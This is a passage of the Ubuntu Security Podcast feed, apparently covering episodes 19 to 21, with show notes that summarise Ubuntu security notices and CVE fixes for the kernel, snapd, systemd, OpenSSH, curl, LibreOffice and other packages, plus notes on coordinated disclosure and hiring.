</ul>
</li>
<li>Memory corruption and type confusion errors - leading to possible remote code execution</li>
</ul>
<h3 id="usn-3890-1-django-vulnerability">[<a href="https://usn.ubuntu.com/3890-1/">USN-3890-1</a>] Django vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6975">CVE-2019-6975</a></li>
</ul>
</li>
<li>Could cause Django to consume a large amount of memory when formatting a decimal number with a large number of digits or with a large exponent since it would simply print every single provided character</li>
<li>Possible DoS although would need a very large number to be input</li>
<li>Fix is to format numbers with more than 200 characters in scientific notation</li>
</ul>
<h3 id="usn-3887-1-snapd-vulnerability">[<a href="https://usn.ubuntu.com/3887-1/">USN-3887-1</a>] snapd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7304">CVE-2019-7304</a></li>
</ul>
</li>
<li><a href="https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html">&lsquo;DirtySock&rsquo; - discovered by Chris Moberly</a></li>
<li>Failed to correctly parse and validate the remote socket address</li>
<li>Code had undergone refactoring and introduced this bug</li>
<li>Allows to impersonate privileged user and therefore call privileged APIs via the snapd socket</li>
</ul>
<h3 id="usn-3850-2-nss-vulnerabilities">[<a href="https://usn.ubuntu.com/3850-2/">USN-3850-2</a>] NSS vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12404">CVE-2018-12404</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12384">CVE-2018-12384</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0495">CVE-2018-0495</a></li>
</ul>
</li>
<li>Covered back in <a href="https://ubuntusecuritypodcast.org/episode-17/">Episode 17</a></li>
</ul>
<h3 id="usn-3891-1-systemd-vulnerability">[<a href="https://usn.ubuntu.com/3891-1/">USN-3891-1</a>] systemd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6454">CVE-2019-6454</a></li>
</ul>
</li>
<li><a href="https://www.openwall.com/lists/oss-security/2019/02/18/3">Discovered by Ubuntu Security team member Chris Coulson</a></li>
<li>Stack buffer overflow of DBus path field - declared as VLA, but sender could use a value larger than the stack size and therefore jump the entire stack and the guard pages</li>
<li>Segmentation violation -&gt; crash -&gt; DoS
<ul>
<li>systemd does not automatically restart so brings down entire system - reboot</li>
</ul>
</li>
<li>Possible code execution but unlikely</li>
<li>DBus and systemd need to agree on what the maximum size of various elements are - DBus spec says path could be unlimited - but in practice is less than 32MB! (dbus-daemon limits messages to this size) - systemd now limits path to 64KB AND ensures it keeps running after receiving an invalid sized path</li>
</ul>
<h3 id="usn-3892-1-gdm-vulnerability">[<a href="https://usn.ubuntu.com/3892-1/">USN-3892-1</a>] GDM vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3825">CVE-2019-3825</a></li>
</ul>
</li>
<li>Logic error in handing of timed logins (not enabled by default)</li>
<li>If screen already locked, select to log in as different user - then select a user which has timed login enabled - after timeout will unlock screen of original user</li>
<li>Need administrator privileges to enabled timed login for a given user so low impact</li>
</ul>
<h3 id="usn-3866-2-ghostscript-regression">[<a href="https://usn.ubuntu.com/3866-2/">USN-3866-2</a>] Ghostscript regression</h3>
<ul>
<li>Affecting Trusty, Xenial, Bionic, Cosmic</li>
<li>Previous update for Ghostscript (<a href="https://usn.ubuntu.com/3866-1/">USN-3866-1</a> - <a href="https://ubuntusecuritypodcast.org/episode-18/">Episode 18</a>) caused a regression in printing 4&quot;x6&quot; (v9.26 - upstream bug)</li>
</ul>
<h3 id="usn-3893-1-bind-vulnerabilities">[<a href="https://usn.ubuntu.com/3893-1/">USN-3893-1</a>] Bind vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6465">CVE-2019-6465</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5745">CVE-2018-5745</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5744">CVE-2018-5744</a></li>
</ul>
</li>
<li>Fail to properly apply controls to zone transfers - could allow clients to request and receive a zone transfer to a dynamically loadable zone contrary to the allow-transfer ACL</li>
<li>Assertion failure if a trust anchor&rsquo;s keys are replaced with keys using an unsupported algorithm during a key rollover when using the managed-keys feature for DNSSEC validation</li>
<li>Remotely triggerable memory leak when processing particular packets - DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="snapd-systemd-and-handling-of-embargoed-issues">snapd, systemd and handling of embargoed issues</h3>
<ul>
<li>2 updates involving close communication between Ubuntu Security Team and external stakeholders - embargoed</li>
<li>Responsible Disclosure - allows to coordinate a fix in a timely manner and then release update once all parties are ready in a coordinated manner</li>
<li>Set CRD with stakeholders (reporter, upstream, other distros etc)</li>
<li>Coordinate fix with upstream and other distros</li>
<li>Plan coordinated updates to be released with other distros / upstream at CRD</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-automation-engineer">Security Automation Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548632">https://boards.greenhouse.io/canonical/jobs/1548632</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E021.mp3" length="16856841" type="audio/mpeg" /><itunes:duration>17:33</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 20
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-20/</link>
          <pubDate>Mon, 11 Feb 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E020.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 20</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security...
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.</itunes:summary>
        <description>This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.</description>
        <googleplay:description>This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>33 unique CVEs addressed</p>
<h3 id="usn-3871-3-usn-3871-4-usn-3871-5-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3871-3/">USN-3871-3</a>, <a href="https://usn.ubuntu.com/3871-4/">USN-3871-4</a>, <a href="https://usn.ubuntu.com/3871-5/">USN-3871-5</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Bionic and Xenial (HWE - backport of Bionic kernel to Xenial)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9516">CVE-2018-9516</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19407">CVE-2018-19407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18281">CVE-2018-18281</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16882">CVE-2018-16882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14625">CVE-2018-14625</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10883">CVE-2018-10883</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10880">CVE-2018-10880</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10882">CVE-2018-10882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10878">CVE-2018-10878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10877">CVE-2018-10877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10879">CVE-2018-10879</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10876">CVE-2018-10876</a></li>
</ul>
</li>
<li>Last week (<a href="https://ubuntusecuritypodcast.org/episode-19/">Episode 19</a>) covered kernel update for Bionic in preparation for 18.04.2
<ul>
<li>this is the corresponding update for various platforms using the Bionic kernel</li>
<li>(AWS, GCP, KVM, OEM, Raspberry Pi 2) (Azure)</li>
</ul>
</li>
</ul>
<h3 id="usn-3878-1-usn-3878-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3878-1/">USN-3878-1</a>, <a href="https://usn.ubuntu.com/3878-2/">USN-3878-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19854">CVE-2018-19854</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19407">CVE-2018-19407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16882">CVE-2018-16882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14625">CVE-2018-14625</a></li>
</ul>
</li>
<li>Last week (<a href="https://ubuntusecuritypodcast.org/episode-19/">Episode 19</a>) covered kernel update for Bionic in preparation for 18.04.2
<ul>
<li>Included the Cosmic HWE kernel for Bionic as well - this is the corresponding update for Cosmic itself on all supported platforms (physical and cloud etc)</li>
</ul>
</li>
</ul>
<h3 id="usn-3879-1-usn-3879-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3879-1/">USN-3879-1</a>, USN-3879-2] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial and Trusty (Xenial HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20169">CVE-2018-20169</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19824">CVE-2018-19824</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19407">CVE-2018-19407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16862">CVE-2018-16862</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10883">CVE-2018-10883</a></li>
</ul>
</li>
<li>OOB read on reading USB device descriptor  - need local physical access to connect a malicious device - crash -&gt; DoS</li>
<li>UAF in ALSA via a malicious USB sound device that expose zero interfaces - crash -&gt; DoS, possible code execution</li>
<li>Uninitialised ioapics (<a href="https://ubuntusecuritypodcast.org/episode-19/">Episode 19</a>)</li>
<li>Cleancache subsystem - after file truncation (removal), wouldn&rsquo;t properly clear inode so if a new file was created with the same inode might contain leftover pages from cleancache and hence the data from the old file
<ul>
<li>Only affects Ubuntu kernels under Xen with tmem driver</li>
</ul>
</li>
<li>ext4 - OOB write via malicious crafted image</li>
</ul>
<h3 id="usn-3880-1-usn-3880-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3880-1/">USN-3880-1</a>, USN-3880-2] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty and Precise ESM (Trusty HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9568">CVE-2018-9568</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18281">CVE-2018-18281</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1066">CVE-2018-1066</a></li>
</ul>
</li>
<li>Possible memory corruption via type confusion when cloning a socket - privilege escalation</li>
<li>mremap() issue (covered in <a href="https://ubuntusecuritypodcast.org/episode-15/">Episode 15</a>)</li>
<li>procfs stack unwinding to leak kernel stack from other task (covered in <a href="https://ubuntusecuritypodcast.org/episode-12/">Episode 12</a>)</li>
<li>NULL pointer dereference in CIFS client in kernel triggered by a malicious server (crash -&gt; DoS)</li>
</ul>
<h3 id="usn-3881-1-usn-3881-2-dovecot-vulnerability">[<a href="https://usn.ubuntu.com/3881-1/">USN-3881-1</a>, <a href="https://usn.ubuntu.com/3881-2/">USN-3881-2</a>] Dovecot vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3814">CVE-2019-3814</a></li>
</ul>
</li>
<li>Interaction of username / password authentication with trusted SSL cert - can configure for user/pass but can also configure for client to present a trusted cert</li>
<li>Can configure to take username from cert instead of from explicit username AND also to configure no password if using cert</li>
<li>BUT if no username in cert, will use specified username - so could log in as any user</li>
</ul>
<h3 id="usn-3882-1-curl-vulnerabilities">[<a href="https://usn.ubuntu.com/3882-1/">USN-3882-1</a>] curl vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3823">CVE-2019-3823</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3822">CVE-2019-3822</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16890">CVE-2018-16890</a></li>
</ul>
</li>
<li>OOB read when parsing end of response for SMTP</li>
<li>Stack buffer overflow when creating an NTLMv2 type-3 header based on previous received data (size checks were not sufficient since they suffered from an integer overflow)</li>
<li>OOB read for NTLM type-2 handling via an integer overflow</li>
</ul>
<h3 id="usn-3883-1-libreoffice-vulnerabilities">[<a href="https://usn.ubuntu.com/3883-1/">USN-3883-1</a>] LibreOffice vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16858">CVE-2018-16858</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10583">CVE-2018-10583</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11790">CVE-2018-11790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10120">CVE-2018-10120</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10119">CVE-2018-10119</a></li>
</ul>
</li>
<li>3 CVEs for mishandling various elements in different document types - UAF, heap-based buffer overflow (write) etc) - crash -&gt; DoS, possible code execution</li>
<li>Information disclosure (leak of NTLM hashes) via an embedded link to a remote SMB resource within a document</li>
<li>Directory traversal flaw leading to code execution
<ul>
<li>document can links which like HTML, can have attributes such as a
script which will get executed without prompting - so onMouseOver()
etc</li>
<li>and this can refer to a file on the local filesystem outside the
document structure itself</li>
<li>libreoffice ships with it&rsquo;s own Python interpreter that contains
functions which can be abused to run arbitrary commands</li>
<li>so can specify both the path to one of these files AND arguments to
pass to it to run</li>
</ul>
</li>
</ul>
<h3 id="usn-3884-1-libarchive-vulnerabilities">[<a href="https://usn.ubuntu.com/3884-1/">USN-3884-1</a>] libarchive vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1000020">CVE-2019-1000020</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1000019">CVE-2019-1000019</a></li>
</ul>
</li>
<li>Infinite loop when parsing a specially crafted ISO9660 CD/DVD iso file -&gt; DoS</li>
<li>OOB read when decompressing a specially crafted 7z file -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3885-1-openssh-vulnerabilities">[<a href="https://usn.ubuntu.com/3885-1/">USN-3885-1</a>] OpenSSH vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6111">CVE-2019-6111</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6109">CVE-2019-6109</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20685">CVE-2018-20685</a></li>
</ul>
</li>
<li>Three vulnerabilities in scp able to be triggered via a malicious server (low probability)
<ul>
<li>Fails to validate file names from the remote server match the requested ones - server can overwrite arbitrary files on local side in the target directory</li>
<li>Fails to use proper character encoding in progress display, allows server to manipulate output of client to hide output of additional files being sent</li>
<li>Fails to check if target filename is . or empty - allows remote server to change permissions of the client local directory</li>
</ul>
</li>
<li>Together allow a server to easily overwrite local files on the client side without the client user being aware</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="faqs-about-ubuntu-security">FAQs about Ubuntu Security</h3>
<h4 id="what-packages-are-supported">What packages are supported?</h4>
<ul>
<li>main only (~2.3k source packages in Bionic - cf. universe ~26k source packages)</li>
</ul>
<h4 id="what-timeframe">What timeframe?</h4>
<ul>
<li>lifetime of the release - so from official release date to EOL date</li>
<li>LTS: 5 years, non-LTS: 9 months</li>
<li><a href="https://www.ubuntu.com/esm">ESM provides security fixes beyond the EOL for LTS releases</a></li>
</ul>
<h4 id="why-do-we-backport-patches-instead-of-just-updating-to-the-lastest-versions">Why do we backport patches instead of just updating to the lastest versions?</h4>
<ul>
<li>Users expect high degree of stability
<ul>
<li>changes need caution and good rationale</li>
<li>lots of previous regressions from innocent looking changes</li>
<li>no change is completely free of risk</li>
</ul>
</li>
<li>Only changes which have high impact (security fixes, severe regressions, loss of data etc)</li>
<li>More details see <a href="https://wiki.ubuntu.com/StableReleaseUpdates#Why">SRU page on Ubuntu wiki</a></li>
<li>So security updates must follow suit</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E020.mp3" length="16242441" type="audio/mpeg" /><itunes:duration>16:55</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 19
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-19/</link>
          <pubDate>Mon, 04 Feb 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E019.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 19</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart...
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in [Episode 17](https://ubuntusecuritypodcast.org/episode-17/).</itunes:summary>
        <description>This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in [Episode 17](https://ubuntusecuritypodcast.org/episode-17/).</description>
        <googleplay:description>This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in [Episode 17](https://ubuntusecuritypodcast.org/episode-17/).</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in <a href="https://ubuntusecuritypodcast.org/episode-17/">Episode 17</a>.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>40 unique CVEs addressed</p>
<h3 id="usn-3870-1-spice-vulnerability">[<a href="https://usn.ubuntu.com/3870-1/">USN-3870-1</a>] Spice vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3813">CVE-2019-3813</a></li>
</ul>
</li>
<li>Out-of-bounds read - off-by-one - likely crash on segmentation violation but possible code-execution</li>
</ul>
<h3 id="usn-3871-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3871-1/">USN-3871-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9516">CVE-2018-9516</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19407">CVE-2018-19407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18281">CVE-2018-18281</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16882">CVE-2018-16882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14625">CVE-2018-14625</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10883">CVE-2018-10883</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10880">CVE-2018-10880</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10882">CVE-2018-10882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10878">CVE-2018-10878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10877">CVE-2018-10877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10879">CVE-2018-10879</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10876">CVE-2018-10876</a></li>
</ul>
</li>
<li>NULL pointer dereference in KVM able to be triggered by a local user (crash -&gt; DoS)</li>
<li>mremap() TLB flush leaving stale entries in page cache - covered previously in <a href="https://ubuntusecuritypodcast.org/episode-15/">Episode 15</a></li>
<li><a href="https://ubuntusecuritypodcast.org/episode-15/">Episode 15</a> covered CVE-2018-17972 (procfs kernel stack disclosure)</li>
<li>UAF in KVM when using nested virtualisation (not enabled by default for Ubuntu kernels) able to be trigered by gust VM to crash host (DoS) or possibly elevate privileges etc.</li>
<li>Race condition between connect() and close() in AF_VSOCK (used for communication between guest and host machines) could allow to read 4 bytes of memory (UAF) from host kernel or possibly corrupt other AF_VSOCK messages to other guests - information leak</li>
<li>7 ext4 issues discovered by Wen Xu (fuzzing ext4 with KASAN enabled):
<ul>
<li>OOB write during update of journal metadata when mounting specially crafted ext4 image - crash -&gt; DoS (privilege esc?)</li>
<li>OOB write to stack when processing xattrs of specially crafted ext4 image - crash -&gt; DoS</li>
<li>OOB write when mounting</li>
<li>OOB write unmounting specially crafted ext4 image</li>
<li>OOB read when mounting</li>
<li>UAF when processing xattrs of renamed file in specially crafted image</li>
<li>General UAF when mouting a specially crafted image</li>
<li>Reproducers provided in upstream kernel bug reports</li>
</ul>
</li>
</ul>
<h3 id="usn-3872-1-linux-kernel--hwe--vulnerabilities">[<a href="https://usn.ubuntu.com/3872-1/">USN-3872-1</a>] Linux kernel (HWE) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19854">CVE-2018-19854</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19407">CVE-2018-19407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16882">CVE-2018-16882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14625">CVE-2018-14625</a></li>
</ul>
</li>
<li>Info leak from crypto subsystem - regression of CVE-2013-2547 - fail to fully initialise structure members copied to userspace - unlike CVE-2013-2547, able to be exploited by a standard user without any capabilities</li>
<li>Failure to ensure ioapics were initialised - possible NULL pointer dereference -&gt; crash -&gt; DoS</li>
<li>KVM UAF w/ nested virtualisation and AF_VSOCK race condition UAF</li>
</ul>
<h3 id="usn-3873-1-open-vswitch-vulnerabilities">[<a href="https://usn.ubuntu.com/3873-1/">USN-3873-1</a>] Open vSwitch vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17206">CVE-2018-17206</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17205">CVE-2018-17205</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17204">CVE-2018-17204</a></li>
</ul>
</li>
<li>Remotely triggerable OOB read and 2 different assertion failures -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3874-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3874-1/">USN-3874-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18506">CVE-2018-18506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18505">CVE-2018-18505</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18504">CVE-2018-18504</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18503">CVE-2018-18503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18502">CVE-2018-18502</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18501">CVE-2018-18501</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18500">CVE-2018-18500</a></li>
</ul>
</li>
<li>Firefox 65 for all supported platforms
<ul>
<li>Proxy autoconfig file (PAC) could allow proxy requests to localhost to go via remote proxy - <strong>if</strong> enabled proxy-autodetection - then possible for remote attacker to conduct attacks against local services etc</li>
<li>Various memory safety issues - crash -&gt; DoS, UAF, code execution</li>
<li>Sandbox escape via IPC channels due to failure to properly apply authentication to IPC channels in some situations
<ul>
<li>IPC channels used in new multiprocess architecture etc</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3875-1-openjdk-vulnerability">[<a href="https://usn.ubuntu.com/3875-1/">USN-3875-1</a>] OpenJDK vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2422">CVE-2019-2422</a></li>
</ul>
</li>
<li>Info leak from Java SE VM in OpenJDK library subsystem able to be triggered by a remote attacker - possible sandbox bypass as well</li>
</ul>
<h3 id="usn-3876-1-usn-3876-2-avahi-vulnerabilities">[<a href="https://usn.ubuntu.com/3876-1/">USN-3876-1</a>, USN-3876-2] Avahi vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000845">CVE-2018-1000845</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6519">CVE-2017-6519</a></li>
</ul>
</li>
<li>Both the same vulnerability - duplicate CVE</li>
<li>Traffic reflection and amplification - possible to leverage for DDoS attack since avahi-daemon would inadvertently respond to unicast IPv6 queries to source addresses which were not on the local link</li>
</ul>
<h3 id="usn-3877-1-libvncserver-vulnerabilities">[<a href="https://usn.ubuntu.com/3877-1/">USN-3877-1</a>] LibVNCServer vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6307">CVE-2018-6307</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20750">CVE-2018-20750</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20749">CVE-2018-20749</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20748">CVE-2018-20748</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20024">CVE-2018-20024</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20023">CVE-2018-20023</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20022">CVE-2018-20022</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20021">CVE-2018-20021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20020">CVE-2018-20020</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20019">CVE-2018-20019</a></li>
